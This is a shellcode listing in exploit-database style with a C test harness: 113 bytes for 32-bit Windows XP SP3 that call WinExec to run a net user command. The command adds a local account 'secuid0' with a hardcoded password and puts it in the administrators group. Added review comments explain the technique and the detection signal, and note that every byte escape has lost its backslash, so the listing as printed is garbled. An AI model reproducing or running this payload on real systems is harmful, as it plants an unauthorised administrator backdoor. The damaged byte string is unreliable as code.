
# Title : win32/xp pro sp3 (EN) 32-bit - add new local administrator 113 bytes
# Published : 2010-10-04
# Author :


/*
Title: win32/xp pro sp3 (EN) 32-bit - add new local administrator 113 bytes
Author: Anastasios Monachos (secuid0) - anastasiosm[at]gmail[dot]com
Method: Hardcoded API addresses (kernel32.winexec@7c8623ad, kernel32.exitprocess@7c81cafa)
Tested on: WinXP Pro SP3 (EN) 32bit - Build 2600.080413-2111
Greetz: offsec and inj3ct0r teams
*/
#include <stdio.h>
#include <string.h>
#include <stdlib.h>

/*
 * Position-independent payload described in the header above: a short
 * jmp / call / pop sequence recovers the address of the trailing ASCII
 * string, which is then passed to the two hardcoded kernel32 addresses
 * named there (WinExec first, then ExitProcess).  The trailing bytes decode
 * to a "cmd.exe /c net user ... /add && net localgroup administrators ...
 * /add" command line, so on the host this would surface as cmd.exe
 * spawning net.exe with "/add" arguments -- the process-creation event a
 * detection rule keys on.  Because the API addresses are hardcoded the
 * payload is tied to the exact build listed in the header; on any other
 * build the indirect calls land elsewhere and the process would most
 * likely crash.
 *
 * NOTE(review): as printed here every "\x" escape has lost its backslash,
 * so this initializer is plain ASCII text rather than the byte values the
 * author intended -- presumably an artefact of how the page was extracted.
 */
char code[] = 	"xebx16x5bx31xc0x50x53xbbxadx23"   /* jmp to the call; pop ebx; xor eax,eax; push eax; push ebx; mov ebx,<WinExec> ... */
				"x86x7cxffxd3x31xc0x50xbbxfaxca"   /* ... call ebx; xor eax,eax; push eax; mov ebx,<ExitProcess> ... */
				"x81x7cxffxd3xe8xe5xffxffxffx63"   /* ... call ebx; call back to the pop (pushes string address); 'c' */
				"x6dx64x2ex65x78x65x20x2fx63x20"   /* ASCII command line begins: "md.exe /c " ... */
				"x6ex65x74x20x75x73x65x72x20x73"
				"x65x63x75x69x64x30x20x6dx30x6e"
				"x6bx20x2fx61x64x64x20x26x26x20"
				"x6ex65x74x20x6cx6fx63x61x6cx67"
				"x72x6fx75x70x20x61x64x6dx69x6e"
				"x69x73x74x72x61x74x6fx72x73x20"
				"x73x65x63x75x69x64x30x20x2fx61"
				"x64x64x00";                         /* ... "dd" plus the NUL terminator WinExec expects */

/*
 * Entry point: transfers control into the global `code` array, i.e.
 * executes a data object as machine code.  Converting an object pointer to
 * a function pointer is undefined in ISO C, and the jump only succeeds
 * when the data section is executable -- DEP/NX denies exactly this, which
 * is the mitigation the technique depends on being absent.  Per the header
 * the payload ends in ExitProcess, so the printf below is normally never
 * reached; it runs only if the call returns (e.g. the payload failed).
 *
 * argc/argv are unused.  Returns 0 if control ever gets back here.
 */
int main(int argc, char **argv)
{
	((void (*)())code)();   /* data-as-code call; no return on success (ExitProcess) */
	printf("New local admin tUsername: secuid0ntttPassword: m0nk");   /* NOTE(review): the stray "t"/"n" look like "\t"/"\n" whose backslashes were lost in extraction; as written there is no trailing newline */
	return 0;
}